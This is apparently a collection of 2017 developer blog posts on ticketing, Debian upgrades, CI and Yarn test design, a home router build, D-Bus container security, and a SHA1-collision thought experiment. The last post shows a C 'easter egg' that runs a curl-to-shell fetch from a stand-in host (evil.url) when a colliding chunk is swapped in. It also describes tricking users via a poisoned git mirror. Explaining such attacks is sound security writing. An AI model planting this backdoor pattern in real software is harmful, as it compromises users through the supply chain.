See also See also the following links. I've used them to learn enough to write the above. Edited to fix:
  • Output of gpg -K after removing secret master key.

27 May 2017

Lars Wirzenius: Distix movement

Distix is my distributed ticketing system. I initially wrote the core of it as a bit of programming performance art, to celebrate my 30 years as a programmer. Distix is built on top of git and emails in Maildirs. It is a silent listener to your issue and bug discussions: as long as you ensure it gets a copy of each mail, it takes care of automatically arranging things into separate tickets based on email threading. Users and customers do not need to even know Distix is being used. Only the "support staff" need ever interact with Distix, and they mostly only need to close tickets that have been dealt with. I've been using Distix for my own stuff for some time now, and recently we've started using it at work. I slowly improve it as we find problems. It's not a sleek, smooth, finished tool. It's clunky, weird, and probably not what you want. But it's what I want. Changes in recent months:
  • There is a new website: http://distix.eu/. No particular good reason for a new website, but I won the domain for free a couple of years ago, so I might as well use it.
  • In addition, a ticketing system for Distix itself: http://tickets.distix.eu/. Possibly I should've called the subdomain dogfood, but I'm a serious person, not prone to trying to be funny.
  • Mails can now be imported using IMAP.
  • Importing has been optimized for speed and memory use, making my own production use more practical.
I've discussed with a friend the possibility of writing a web UI, and some day maybe that will happen. For now, distix is a command line applicaton that can generate a static HTML site.

24 May 2017

Steve Kemp: Getting ready for Stretch

I run about 17 servers. Of those about six are very personal and the rest are a small cluster which are used for a single website. (Partly because the code is old and in some ways a bit badly designed, partly because "clustering!", "high availability!", "learning!", "fun!" - seriously I had a lot of fun putting together a fault-tolerant deployment with haproxy, ucarp, etc, etc. If I were paying for it the site would be both retired and static!) I've started the process of upgrading to stretch by picking a bunch of hosts that do things I could live without for a few days - in case there were big problems, or I needed to restore from backups. So far I've upgraded:
  • master.steve
    • This is a puppet-master, so while it is important killing it wouldn't be too bad - after all my nodes are currently setup properly, right?
    • Upgrading this host changed the puppet-server from 3.x to 4.x.
    • That meant I had to upgrade all my client-systems, because puppet 3.x won't talk to a 4.x master.
    • Happily jessie-backports contains a recent puppet-client.
    • It also meant I had to rework a lot of my recipes, in small ways.
  • builder.steve
    • This is a host I use to build packages upon, via pbuilder.
    • I have chroots setup for wheezy, jessie, and stretch, each in i386 and amd64 flavours.
  • git.steve
    • This is a host which stores my git-repositories, via gitbucket.
    • While it is an important host in terms of functionality, the software it needs is very basic: nginx proxies to a java application which runs on localhost:XXXX, with some caching magic happening to deal with abusive clients.
    • I do keep considering using gitlab, because I like its runners, etc. But that is pretty resource intensive.
    • On the other hand If I did switch I could drop my builder.steve host, which might mean I'd come out ahead in terms of used resources.
  • leave.steve
    • Torrent-box.
    • Upgrading was painless, I only run rtorrent, and a simple object storage system of my own devising.
All upgrades were painless, with only one real surprise - the attic-backup software was removed from Debian. Although I do intend to retry using Larss' excellent obnum in the near future pragmatically I wanted to stick with what I'm familiar with. Borg backup is a fork of attic I've been aware of for a long time, but I never quite had a reason to try it out. Setting it up pretty much just meant editing my backup-script:
s/attic/borg/g
Once I did that, and created some new destinations all was good:
borg@rsync.io ~ $ borg init /backups/git.steve.org.uk.borg/
borg@rsync.io ~ $ borg init /backups/master.steve.org.uk.borg/
borg@rsync.io ~ $ ..
Upgrading other hosts, for example my website(s), and my email-box, will be more complex and fiddly. On that basis they will definitely wait for the formal stretch release. But having a couple of hosts running the frozen distribution is good for testing, and to let me see what is new.

8 May 2017

Lars Wirzenius: Ick2 design discussion

Recently, Daniel visited us in Helsinki. In addition to enjoying local food and scenerey, we spent some time together in front of a whiteboard to sketch out designs for Ick2. Ick is my continuous integration system, and it's all Daniel's fault for suggesting the name. Ahem. I am currently using the first generation of Ick and it is a rigid, cumbersome, and fragile thing. It works well enough that I don't miss Jenkins, but I would like something better. That's the second generation of Ick, or Ick2, and that's what we discussed with Daniel. Where pretty much everything in Ick1 is hardcoded, everything in Ick2 will be user-configurable. It's my last, best chance to go completely overboard in the second system syndrome manner. Where Ick1 was written in a feverish two-week hacking session, rushed because my Jenkins install at the time had broken one time too many, we're taking our time with Ick2. Slow and careful is the tune this time around. Our "minimum viable product" or MVP for Ick2 is defined like this:
Ick2 builds static websites from source in a git repository, using ikiwiki, and published to a web server using rsync. A change to the git repository triggers a new build. It can handle many separate websites, and if given enough worker machines, can build many of them concurrently.
This is a real task, and something we already do with Ick1 at work. It's a reasonable first step for the new program. Some decisions we made:
  • The Ick2 controller, which decides which projects to build, and what's the next build step at any one time, will be reactive only. It will do nothing except in response to an HTTP API request. This includes things like timed events. An external service will need to poke the controller at the right time.
  • The controller will be accompanied by worker manager processes, which fetch instructions of what to do next, and control actual worker over ssh.
  • Provisioning of the workers is out of scope for the MVP. For the MVP we are OK with a static list of workers. In the future we might make worker registration be a dynamic things, but not for the MVP. (Parts or all of this decision may be changed in the future, but we need to start somewhere.)
  • The MVP publishing will happen by running rsync to a web server. Providing credentials for the workers to do that is the sysadmin's problem, not something the MVP will handle itself.
  • The MVP needs to handle more than one worker, and more than one pipelines, and needs to build things concurrently when there's call for it.
  • The MVP will need to read the pipelines (and their steps and any other info) from YAML config files, and can't have that stuff hardcoded.
  • The MVP API will have no authentication or authorization stuff yet.
The initial pipelines will be basically like this, but expressed in some way by the user:
  1. Clone the source repoistory.
  2. Run ikiwiki --build to build the website.
  3. Run rsync to publish the website on a server.
Assumptions:
  • Every worker can clone from the git server.
  • Every worker has all the build tools.
  • Every worker has rsync and access to every web server.
  • Every pipeline run is clean.
Actions the Ick2 controller API needs to support:
  • List all existing projects.
  • Trigger a project to build.
  • Query what project builds are running.
  • Get build logs for a project: current log (from the running build), and the most recent finished build.
A sketch API:
  • POST /projects/foo/+trigger Trigger build of project foo. If the git hasn't changed, the build runs anyway.
  • GET /projects List names of all projects.
  • GET /projects/foo On second thought, I can't think of anything useful for this to return for the MVP. Scratch.
  • GET /projects/foo/logs/current Return entire known build log captured so far for the currently running build.
  • GET /projects/foo/logs/previous Return entire build log for latest finished build.
  • GET /work/bar Used by worker bar: return next not-yet-finished step to run as a JSON object containing fields "project" (name of project for which to run the step) and "shell" (a shell command to run). The call will return the same JSON object until the worker reports it as having finished.
  • POST /work/bar/snippet Used by worker bar to report progress on the currently running step: a JSON object containing fields "stdout" (string with output from the shell command's stdout), "stderr" (ditto but stderr), and "exit_code" (the shell command's exit code, if it's finished, or null).
Sequence:
  • Git server has a hook that calls "GET /projects/foo/+trigger" (or else this is simulated by user).
  • Controller add a build of project foo to queue.
  • Worker manager calls "GET /work/bar", gets a shell command to run, and starts running it on its worker.
  • While worker runs shell command, every second or so, worker manager calls "POST /work/bar/snippet" to report progress including collected output, if any.
  • Controller responds with OK or KILL, and if the latter, worker kills the command it is running. Worker manager continues reporting progress via snippet until shell command is finished (on its own or by having been killed).
  • Controller appends any output reported via .../snippet. When it learns a shell command has finished, it updates its idea of the next step to run.
  • When controller learns a project has finished building, it rotates the current build log to be the previous one.
The next step will probably be to sketch a yarn test suite of the API and implement a rudimentary one.

5 May 2017

Daniel Silverstone: Yarn architecture discussion

Recently Rob and I visited Soile and Lars. We had a lovely time wandering around Helsinki with them, and I also spent a good chunk of time with Lars working on some design and planning for the Yarn test specification and tooling. You see, I wrote a Rust implementation of Yarn called rsyarn "for fun" and in doing so I noted a bunch of missing bits in the understanding Lars and I shared about how Yarn should work. Lars and I filled, and re-filled, a whiteboard with discussion about what the 'Yarn specification' should be, about various language extensions and changes, and also about what functionality a normative implementation of Yarn should have. This article is meant to be a write-up of all of that discussion, but before I start on that, I should probably summarise what Yarn is.
Yarn is a mechanism for specifying tests in a form which is more like documentation than code. Yarn follows the concept of BDD story based design/testing and has a very Cucumberish scenario language in which to write tests. Yarn takes, as input, Markdown documents which contain code blocks with Yarn tests in them; and it then runs those tests and reports on the scenario failures/successes. As an example of a poorly written but still fairly effective Yarn suite, you could look at Gitano's tests or perhaps at Obnam's tests (rendered as HTML). Yarn is not trying to replace unit testing, nor other forms of testing, but rather seeks to be one of a suite of test tools used to help validate software and to verify integrations. Lars writes Yarns which test his server setups for example. As an example, lets look at what a simple test might be for the behaviour of the /bin/true tool:
SCENARIO true should exit with code zero
WHEN /bin/true is run with no arguments
THEN the exit code is 0
 AND stdout is empty
 AND stderr is empty
Anyone ought to be able to understand exactly what that test is doing, even though there's no obvious code to run. Yarn statements are meant to be easily grokked by both developers and managers. This should be so that managers can understand the tests which verify that requirements are being met, without needing to grok python, shell, C, or whatever else is needed to implement the test where the Yarns meet the metal. Obviously, there needs to be a way to join the dots, and Yarn calls those things IMPLEMENTS, for example:
IMPLEMENTS WHEN (\S+) is run with no arguments
set +e
"$ MATCH_1 " > "$ DATADIR /stdout" 2> "$ DATADIR /stderr"
echo $? > "$ DATADIR /exitcode"
As you can see from the example, Yarn IMPLEMENTS can use regular expressions to capture parts of their invocation, allowing the test implementer to handle many different scenario statements with one implementation block. For the rest of the implementation, whatever you assume about things will probably be okay for now.
Given all of the above, we (Lars and I) decided that it would make a lot of sense if there was a set of Yarn scenarios which could validate a Yarn implementation. Such a document could also form the basis of a Yarn specification and also a manual for writing reasonable Yarn scenarios. As such, we wrote up a three-column approach to what we'd need in that test suite. Firstly we considered what the core features of the Yarn language are:
  • Scenario statements themselves (SCENARIO, GIVEN, WHEN, THEN, ASSUMING, FINALLY, AND, IMPLEMENTS, EXAMPLE, ...)
  • Whitespace normalisation of statements
  • Regexp language and behaviour
  • IMPLEMENTS current directory, data directory, home directory, and also environment.
  • Error handling for the statements, or for missing IMPLEMENTS
  • File (and filename) encoding
  • Labelled code blocks (since commonmark includes the backtick code block kind)
  • Exactly one IMPLEMENTS per statement
We considered unusual (or corner) cases and which of them needed defining in the short to medium term:
  • Statements before any SCENARIO or IMPLEMENTS
  • Meaning of split code blocks (concatenation?)
  • Meaning of code blocks not at the top level of a file (ignore?)
  • Meaning of HTML style comments in markdown files
  • Odd scenario ordering (e.g. ASSUMING at the end, or FINALLY at the start)
  • Meaning of empty lines in code blocks or between them.
All of this comes down to how to interpret input to a Yarn implementation. In addition there were a number of things we felt any "normative" Yarn implementation would have to handle or provide in order to be considered useful. It's worth noting that we don't specify anything about an implementation being a command line tool though...
  • Interpreter for IMPLEMENTS (and arguments for them)
  • "Library" for those implementations
  • Ability to require that failed ASSUMING statements lead to an error
  • A way to 'stop on first failure'
  • A way to select a specific scenario to run, from a large suite.
  • Generation of timing reports (per scenario and also per statement)
  • A way to 'skip' missing IMPLEMENTS
  • A clear way to identify the failing step in a scenario.
  • Able to treat multiple input files as a single suite.
There's bound to be more, but right now with the above, we believe we have two roughly conformant Yarn implementations. Lars' Python based implementation which lives in cmdtest (and which I shall refer to as pyyarn for now) and my Rust based one (rsyarn).
One thing which rsyarn supports, but pyyarn does not, is running multiple scenarios in parallel. However when I wrote that support into rsyarn I noticed that there were plenty of issues with running stuff in parallel. (A problem I'm sure any of you who know about threads will appreciate). One particular issue was that scenarios often need to share resources which are not easily sandboxed into the $ DATADIR provided by Yarn. For example databases or access to limited online services. Lars and I had a good chat about that, and decided that a reasonable language extension could be:
USING database foo
with its counterpart
RESOURCE database (\S+)
LABEL database-$1
GIVEN a database called $1
FINALLY database $1 is torn down
The USING statement should be reasonably clear in its pairing to a RESOURCE statement. The LABEL statement I'll get to in a moment (though it's only relevant in a RESOURCE block, and the rest of the statements are essentially substituted into the calling scenario at the point of the USING. This is nowhere near ready to consider adding to the specification though. Both Lars and I are uncomfortable with the $1 syntax though we can't think of anything nicer right now; and the USING/RESOURCE/LABEL vocabulary isn't set in stone either. The idea of the LABEL is that we'd also require that a normative Yarn implementation be capable of specifying resource limits by name. E.g. if a RESOURCE used a LABEL foo then the caller of a Yarn scenario suite could specify that there were 5 foos available. The Yarn implementation would then schedule a maximum of 5 scenarios which are using that label to happen simultaneously. At bare minimum it'd gate new users, but at best it would intelligently schedule them. In addition, since this introduces the concept of parallelism into Yarn proper, we also wanted to add a maximum parallelism setting to the Yarn implementation requirements; and to specify that any resource label which was not explicitly set had a usage limit of 1.
Once we'd discussed the parallelism, we decided that once we had a nice syntax for expanding these sets of statements anyway, we may as well have a syntax for specifying scenario language expansions which could be used to provide something akin to macros for Yarn scenarios. What we came up with as a starter-for-ten was:
CALLING write foo
paired with
EXPANDING write (\S+)
GIVEN bar
WHEN $1 is written to
THEN success was had by all
Again, the CALLING/EXPANDING keywords are not fixed yet, nor is the $1 type syntax, though whatever is used here should match the other places where we might want it.
Finally we discussed multi-line inputs in Yarn. We currently have a syntax akin to:
GIVEN foo
... bar
... baz
which is directly equivalent to:
GIVEN foo bar baz
and this is achieved by collapsing the multiple lines and using the whitespace normalisation functionality of Yarn to replace all whitespace sequences with single space characters. However this means that, for example, injecting chunks of YAML into a Yarn scenario is a pain, as would be including any amount of another whitespace-sensitive input language. After a lot of to-ing and fro-ing, we decided that the right thing to do would be to redefine the ... Yarn statement to be whitespace preserving and to then pass that whitespace through to be matched by the IMPLEMENTS or whatever. In order for that to work, the regexp matching would have to be defined to treat the input as a single line, allowing . to match \n etc. Of course, this would mean that the old functionality wouldn't be possible, so we considered allowing a \ at the end of a line to provide the current kind of behaviour, rewriting the above example as:
GIVEN foo \
bar \
baz
It's not as nice, but since we couldn't find any real uses of ... in any of our Yarn suites where having the whitespace preserved would be an issue, we decided it was worth the pain.
None of the above is, as of yet, set in stone. This blog posting is about me recording the information so that it can be referred to; and also to hopefully spark a little bit of discussion about Yarn. We'd welcome emails to our usual addresses, being poked on Twitter, or on IRC in the common spots we can be found. If you're honestly unsure of how to get hold of us, just comment on this blog post and I'll find your message eventually. Hopefully soon we can start writing that Yarn suite which can be used to validate the behaviour of pyyarn and rsyarn and from there we can implement our new proposals for extending Yarn to be even more useful.

29 March 2017

Lars Wirzenius: A tiny PC as a router

We needed a router and wifi access point in the office, and simultaneously both I and my co-worker Ivan needed such a thing at our respective homes. After some discussion, and after reading articles in Ars Technica about building PCs to act as routers, we decided to do just that.
  • The PC solution seem to offer better performance, but this is actually not a major reason for us.
  • We want to have systems we understand and can hack. A standard x86 PC running Debian sounds ideal to use.
  • Why not a cheap commercial router? They tend to be opaque and mysterious, and can't be managed with standard tooling such as Ansible. They may or may not have good security support. Also, they may or may not have sufficient functionality to be nice things, such as DNS for local machines, or the full power if iptables for firewalling.
  • Why not OpenWRT? Some models of commercial routers are supported by OpenWRT. Finding good hardware that is also supported by OpenWRT is a task in itself, and not the kind of task especially I like to do. Even if one goes this route, the environment isn't quite a standard Linux system, because of various hardware limitations. (OpenWRT is a worthy project, just not our preference.)
We got some hardware:
Component Model Cost
Barebone Qotom Q190G4, VGA, 2x USB 2.0, 134x126x36mm, fanless 130
CPU Intel J1900, 2-2.4GHz quad-core -
NIC Intel WG82583, 4x 10/100/1000 -
Memory Crucial CT102464BF160B, 8GB DDR3L-1600 SODIMM 1.35V CL11 40
SSD Kingston SSDNow mS200, 60GB mSATA 42
WLAN AzureWave AW-NU706H, Ralink RT3070L, 300M 802.11b/g/n, half mPCIe 17
mPCIe adapter Half to full mPCIe adapter 3
Antennas 2x 2.4/5GHz 6dBi, RP-SMA, U.FL Cables 7
These were bought at various online shops, including AliExpress and verkkokauppa.com. After assembling the hardware, we installed Debian on them:
  • Connect the PC to a monitor (VGA) and keyboard (USB), as well as power.
  • I built a "factory image" to be put on the SSD, and a USB stick installer image, which includes the factory one. Write the installer image on a USB stick, boot off that, then copy the factory image to the SSD and reboot off the SSD.
  • The router now runs a very bare-bones, stripped-down Debian system, which runs a DHCP server on eth3 (marked LAN4 on the box). You can log as root on the console (no password), or via ssh, but for ssh you need to replace the /home/ansible/.ssh/authorized_keys file with one that contains only your public ssh key.
  • Connect a laptop to the Ethernet port marked LAN4, and get an IP address with DHCP.
  • Log in with ssh to ansible@10.0.0.4, and verify that sudo id works without password. Except you can't do this, unless you put in your ssh key in the authorized keys file above.
  • Git clone the ansible playbooks, adjust their parameters in minipc-router.yml as wanted, and run the playbook. Then reboot the router again.
  • You should now have wifi, routing (with NAT), and be generally speaking able to do networking.
There's a lot of limitations and problems:
  • There's no web UI for managing anything. If you're not comfortable doing sysadmin via ssh (with or without ansible), this isn't for you.
  • No IPv6. We didn't want to enable it yet, until we understand it better. You can, if you want to.
  • No real firewalling, but adjust roles/router/files/ferm.conf as you wish.
  • The router factory image is 4 GB in size, and our SSD is 60 GB. That's a lot of wasted space.
  • The router factory image embeds our public keys in the ansible user's authorized keys file for ssh. This is because we built this for ourselves first. If there's interest by others in using the images, we'll solve this.
  • Probably a lot of stupid things. Feel free to tell us what it is (bugs@liw.fi would be a good address for that).
If you'd like to use the images and Ansible playbooks, please do. We'd be happy to get feedback, bug reports, and patches. Send them to me (liw@liw.fi) or my ticketing system (bugs@liw.fi).

23 March 2017

Simon McVittie: GTK hackfest 2017: D-Bus communication with containers

At the GTK hackfest in London (which accidentally became mostly a Flatpak hackfest) I've mainly been looking into how to make D-Bus work better for app container technologies like Flatpak and Snap. The initial motivating use cases are:
  • Portals: Portal authors need to be able to identify whether the container is being contacted by an uncontained process (running with the user's full privileges), or whether it is being contacted by a contained process (in a container created by Flatpak or Snap).
  • dconf: Currently, a contained app either has full read/write access to dconf, or no access. It should have read/write access to its own subtree of dconf configuration space, and no access to the rest.
At the moment, Flatpak runs a D-Bus proxy for each app instance that has access to D-Bus, connects to the appropriate bus on the app's behalf, and passes messages through. That proxy is in a container similar to the actual app instance, but not actually the same container; it is trusted to not pass messages through that it shouldn't pass through. The app-identification mechanism works in practice, but is Flatpak-specific, and has a known race condition due to process ID reuse and limitations in the metadata that the Linux kernel maintains for AF_UNIX sockets. In practice the use of X11 rather than Wayland in current systems is a much larger loophole in the container than this race condition, but we want to do better in future. Meanwhile, Snap does its sandboxing with AppArmor, on kernels where it is enabled both at compile-time (Ubuntu, openSUSE, Debian, Debian derivatives like Tails) and at runtime (Ubuntu, openSUSE and Tails, but not Debian by default). Ubuntu's kernel has extra AppArmor features that haven't yet gone upstream, some of which provide reliable app identification via LSM labels, which dbus-daemon can learn by querying its AF_UNIX socket. However, other kernels like the ones in openSUSE and Debian don't have those. The access-control (AppArmor mediation) is implemented in upstream dbus-daemon, but again doesn't work portably, and is not sufficiently fine-grained or flexible to do some of the things we'll likely want to do, particularly in dconf. After a lot of discussion with dconf maintainer Allison Lortie and Flatpak maintainer Alexander Larsson, I think I have a plan for fixing this. This is all subject to change: see fd.o #100344 for the latest ideas. Identity model Each user (uid) has some uncontained processes, plus 0 or more containers. The uncontained processes include dbus-daemon itself, desktop environment components such as gnome-session and gnome-shell, the container managers like Flatpak and Snap, and so on. They have the user's full privileges, and in particular they are allowed to do privileged things on the user's session bus (like running dbus-monitor), and act with the user's full privileges on the system bus. In generic information security jargon, they are the trusted computing base; in AppArmor jargon, they are unconfined. The containers are Flatpak apps, or Snap apps, or other app-container technologies like Firejail and AppImage (if they adopt this mechanism, which I hope they will), or even a mixture (different app-container technologies can coexist on a single system). They are containers (or container instances) and not "apps", because in principle, you could install com.example.MyApp 1.0, run it, and while it's still running, upgrade to com.example.MyApp 2.0 and run that; you'd have two containers for the same app, perhaps with different permissions. Each container has an container type, which is a reversed DNS name like org.flatpak or io.snapcraft representing the container technology, and an app identifier, an arbitrary non-empty string whose meaning is defined by the container technology. For Flatpak, that string would be another reversed DNS name like com.example.MyGreatApp; for Snap, as far as I can tell it would look like example-my-great-app. The container technology can also put arbitrary metadata on the D-Bus representation of a container, again defined and namespaced by the container technology. For instance, Flatpak would use some serialization of the same fields that go in the Flatpak metadata file at the moment. Finally, the container has an opaque container identifier identifying a particular container instance. For example, launching com.example.MyApp twice (maybe different versions or with different command-line options to flatpak run) might result in two containers with different privileges, so they need to have different container identifiers. Contained server sockets App-container managers like Flatpak and Snap would create an AF_UNIX socket inside the container, bind() it to an address that will be made available to the contained processes, and listen(), but not accept() any new connections. Instead, they would fd-pass the new socket to the dbus-daemon by calling a new method, and the dbus-daemon would proceed to accept() connections after the app-container manager has signalled that it has called both bind() and listen(). (See fd.o #100344 for full details.) Processes inside the container must not be allowed to contact the AF_UNIX socket used by the wider, uncontained system - if they could, the dbus-daemon wouldn't be able to distinguish between them and uncontained processes and we'd be back where we started. Instead, they should have the new socket bind-mounted into their container's XDG_RUNTIME_DIR and connect to that, or have the new socket set as their DBUS_SESSION_BUS_ADDRESS and be prevented from connecting to the uncontained socket in some other way. Those familiar with the kdbus proposals a while ago might recognise this as being quite similar to kdbus' concept of endpoints, and I'm considering reusing that name. Along with the socket, the container manager would pass in the container's identity and metadata, and the method would return a unique, opaque identifier for this particular container instance. The basic fields (container technology, technology-specific app ID, container ID) should probably be added to the result of GetConnectionCredentials(), and there should be a new API call to get all of those plus the arbitrary technology-specific metadata. When a process from a container connects to the contained server socket, every message that it sends should also have the container instance ID in a new header field. This is OK even though dbus-daemon does not (in general) forbid sender-specified future header fields, because any dbus-daemon that supported this new feature would guarantee to set that header field correctly, the existing Flatpak D-Bus proxy already filters out unknown header fields, and adding this header field is only ever a reduction in privilege. The reasoning for using the sender's container instance ID (as opposed to the sender's unique name) is for services like dconf to be able to treat multiple unique bus names as belonging to the same equivalence class of contained processes: instead of having to look up the container metadata once per unique name, dconf can look it up once per container instance the first time it sees a new identifier in a header field. For the second and subsequent unique names in the container, dconf can know that the container metadata and permissions are identical to the one it already saw. Access control In principle, we could have the new identification feature without adding any new access control, by keeping Flatpak's proxies. However, in the short term that would mean we'd be adding new API to set up a socket for a container without any access control, and having to keep the proxies anyway, which doesn't seem great; in the longer term, I think we'd find ourselves adding a second new API to set up a socket for a container with new access control. So we might as well bite the bullet and go for the version with access control immediately. In principle, we could also avoid the need for new access control by ensuring that each service that will serve contained clients does its own. However, that makes it really hard to send broadcasts and not have them unintentionally leak information to contained clients - we would need to do something more like kdbus' approach to multicast, where services know who has subscribed to their multicast signals, and that is just not how dbus-daemon works at the moment. If we're going to have access control for broadcasts, it might as well also cover unicast. The plan is that messages from containers to the outside world will be mediated by a new access control mechanism, in parallel with dbus-daemon's current support for firewall-style rules in the XML bus configuration, AppArmor mediation, and SELinux mediation. A message would only be allowed through if the XML configuration, the new container access control mechanism, and the LSM (if any) all agree it should be allowed. By default, processes in a container can send broadcast signals, and send method calls and unicast signals to other processes in the same container. They can also receive method calls from outside the container (so that interfaces like org.freedesktop.Application can work), and send exactly one reply to each of those method calls. They cannot own bus names, communicate with other containers, or send file descriptors (which reduces the scope for denial of service). Obviously, that's not going to be enough for a lot of contained apps, so we need a way to add more access. I'm intending this to be purely additive (start by denying everything except what is always allowed, then add new rules), not a mixture of adding and removing access like the current XML policy language. There are two ways we've identified for rules to be added:
  • The container manager can pass a list of rules into the dbus-daemon at the time it attaches the contained server socket, and they'll be allowed. The obvious example is that an org.freedesktop.Application needs to be allowed to own its own bus name. Flatpak apps' implicit permission to talk to portals, and Flatpak metadata like org.gnome.SessionManager=talk, could also be added this way.
  • System or session services that are specifically designed to be used by untrusted clients, like the version of dconf that Allison is working on, could opt-in to having contained apps allowed to talk to them (effectively making them a generalization of Flatpak portals). The simplest such request, for something like a portal, is "allow connections from any container to contact this service"; but for dconf, we want to go a bit finer-grained, with all containers allowed to contact a single well-known rendezvous object path, and each container allowed to contact an additional object path subtree that is allocated by dconf on-demand for that app.
Initially, many contained apps would work in the first way (and in particular sockets=session-bus would add a rule that allows almost everything), while over time we'll probably want to head towards recommending more use of the second. Related topics Access control on the system bus We talked about the possibility of using a very similar ruleset to control access to the system bus, as an alternative to the XML rules found in /etc/dbus-1/system.d and /usr/share/dbus-1/system.d. We didn't really come to a conclusion here. Allison had the useful insight that the XML rules are acting like a firewall: they're something that is placed in front of potentially-broken services, and not part of the services themselves (which, as with firewalls like ufw, makes it seem rather odd when the services themselves install rules). D-Bus system services already have total control over what requests they will accept from D-Bus peers, and if they rely on the XML rules to mediate that access, they're essentially rejecting that responsibility and hoping the dbus-daemon will protect them. The D-Bus maintainers would much prefer it if system services took responsibility for their own access control (with or without using polkit), because fundamentally the system service is always going to understand its domain and its intended security model better than the dbus-daemon can. Analogously, when a network service listens on all addresses and accepts requests from elsewhere on the LAN, we sometimes work around that by protecting it with a firewall, but the optimal resolution is to get that network service fixed to do proper authentication and access control instead. For system services, we continue to recommend essentially this "firewall" configuration, filling in the $ variables as appropriate:
<busconfig>
    <policy user="$ the daemon uid under which the service runs ">
        <allow own="$ the service's bus name "/>
    </policy>
    <policy context="default">
        <allow send_destination="$ the service's bus name "/>
    </policy>
</busconfig>
We discussed the possibility of moving towards a model where the daemon uid to be allowed is written in the .service file, together with an opt-in to "modern D-Bus access control" that makes the "firewall" unnecessary; after some flag day when all significant system services follow that pattern, dbus-daemon would even have the option of no longer applying the "firewall" (moving to an allow-by-default model) and just refusing to activate system services that have not opted in to being safe to use without it. However, the "firewall" also protects system bus clients, and services like Avahi that are not bus-activatable, against unintended access, which is harder to solve via that approach; so this is going to take more thought. For system services' clients that follow the "agent" pattern (BlueZ, polkit, NetworkManager, Geoclue), the correct "firewall" configuration is more complicated. At some point I'll try to write up a best-practice for these. New header fields for the system bus At the moment, it's harder than it needs to be to provide non-trivial access control on the system bus, because on receiving a method call, a service has to remember what was in the method call, then call GetConnectionCredentials() to find out who sent it, then only process the actual request when it has the information necessary to do access control. Allison and I had hoped to resolve this by adding new D-Bus message header fields with the user ID, the LSM label, and other interesting facts for access control. These could be "opt-in" to avoid increasing message sizes for no reason: in particular, it is not typically useful for session services to receive the user ID, because only one user ID is allowed to connect to the session bus anyway. Unfortunately, the dbus-daemon currently lets unknown fields through without modification. With hindsight this seems an unwise design choice, because header fields are a finite resource (there are 255 possible header fields) and are defined by the D-Bus Specification. The only field that can currently be trusted is the sender's unique name, because the dbus-daemon sets that field, overwriting the value in the original message (if any). To make it safe to rely on the new fields, we would have to make the dbus-daemon filter out all unknown header fields, and introduce a mechanism for the service to check (during connection to the bus) whether the dbus-daemon is sufficiently new that it does so. If connected to an older dbus-daemon, the service would not be able to rely on the new fields being true, so it would have to ignore the new fields and treat them as unset. The specification is sufficiently vague that making new dbus-daemons filter out unknown header fields is a valid change (it just says that "Header fields with an unknown or unexpected field code must be ignored", without specifying who must ignore them, so having the dbus-daemon delete those fields seems spec-compliant). This all seemed fine when we discussed it in person; but GDBus already has accessors for arbitrary header fields by numeric ID, and I'm concerned that this might mean it's too easy for a system service to be accidentally insecure: It would be natural (but wrong!) for an implementor to assume that if g_message_get_header (message, G_DBUS_MESSAGE_HEADER_FIELD_SENDER_UID) returned non-NULL, then that was guaranteed to be the correct, valid sender uid. As a result, fd.o #100317 might have to be abandoned. I think more thought is needed on that one. Unrelated topics As happens at any good meeting, we took the opportunity of high-bandwidth discussion to cover many useful things and several useless ones. Other discussions that I got into during the hackfest included, in no particular order:
  • .desktop file categories and how to adapt them for AppStream, perhaps involving using the .desktop vocabulary but relaxing some of the hierarchy restrictions so they behave more like "tags"
  • how to build a recommended/reference "app store" around Flatpak, aiming to host upstream-supported builds of major projects like LibreOffice
  • how Endless do their content-presenting and content-consuming apps in GTK, with a lot of "tile"-based UIs with automatic resizing and reflowing (similar to responsive design), and the applicability of similar widgets to GNOME and upstream GTK
  • whether and how to switch GNOME developer documentation to Hotdoc
  • whether pies, fish and chips or scotch eggs were the most British lunch available from Borough Market
  • the distinction between stout, mild and porter
More notes are available from the GNOME wiki. Acknowledgements The GTK hackfest was organised by GNOME and hosted by Red Hat and Endless. My attendance was sponsored by Collabora. Thanks to all the sponsors and organisers, and the developers and organisations who attended.

24 February 2017

Joey Hess: SHA1 collision via ASCII art

Happy SHA1 collision day everybody! If you extract the differences between the good.pdf and bad.pdf attached to the paper, you'll find it all comes down to a small ~128 byte chunk of random-looking binary data that varies between the files. The SHA1 attack announced today is a common-prefix attack. The common prefix that we will use is this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
(To be extra sneaky, you can add a git blob object header to that prefix before calculating the collisions. Doing so will make the SHA1 that git generates when checking in the colliding file be the thing that collides. This makes it easier to swap in the bad file later on, because you can publish a git repository containing it, and trick people into using that repository. ("I put a mirror on github!") The developers of the program will have the good version in their repositories and not notice that users are getting the bad version.) Suppose that the attack was able to find collisions using only printable ASCII characters when calculating those chunks. The "good" data chunk might then look like this:
7*yLN#!NOKj@ FPKW".<i+sOCsx9QiFO0UR3ES*Eh]g6r/anP=bZ6&IJ#cOS.w;oJkVW"<*.!,qjRht?+^=^/Q*Is0K>6F)fc(ZS5cO#"aEavPLI[oI(kF_l!V6ycArQ
And the "bad" data chunk like this:
9xiV^Ksn=<A!<^ l4~ uY2x8krnY@JA<<FA0Z+Fw!;UqC(1_ZA^fu#e Z>w_/S?.5q^!WY7VE>gXl.M@d6]a*jW1eY(Qw(r5(rW8G)?Bt3UT4fas5nphxWPFFLXxS/xh
Now we need an ASCII artist. This could be a human, or it could be a machine. The artist needs to make an ASCII art where the first line is the good chunk, and the rest of the lines obfuscate how random the first line is. Quick demo from a not very artistic ASCII artist, of the first 10th of such a picture based on the "good" line above:
7*yLN#!NOK
3*\LN'\NO@
3*/LN  \.A
5*\LN   \.
>=======:)
5*\7N   /.
3*/7N  /.V
3*\7N'/NO@
7*y7N#!NOX
Now, take your ASCII art and embed it in a multiline quote in a C source file, like this:
/* ASCII art for easter egg. */
char *amazing_ascii_art="\
7*yLN#!NOK \
3*\\LN'\\NO@ \
3*/LN  \\.A \ 
5*\\LN   \\. \
>=======:) \
5*\\7N   /. \
3*/7N  /.V \
3*\\7N'/NO@ \
7*y7N#!NOX";
/* We had to escape backslashes above to make it a valid C string.
 * Run program with --easter-egg to see it in all its glory.
 */
/* Call this at the top of main() */
check_display_easter_egg (char **argv)  
    if (strcmp(argv[1], "--easter-egg") == 0)
        printf(amazing_ascii_art);
    if (amazing_ascii_art[0] == "9")
        system("curl http://evil.url   sh");
 
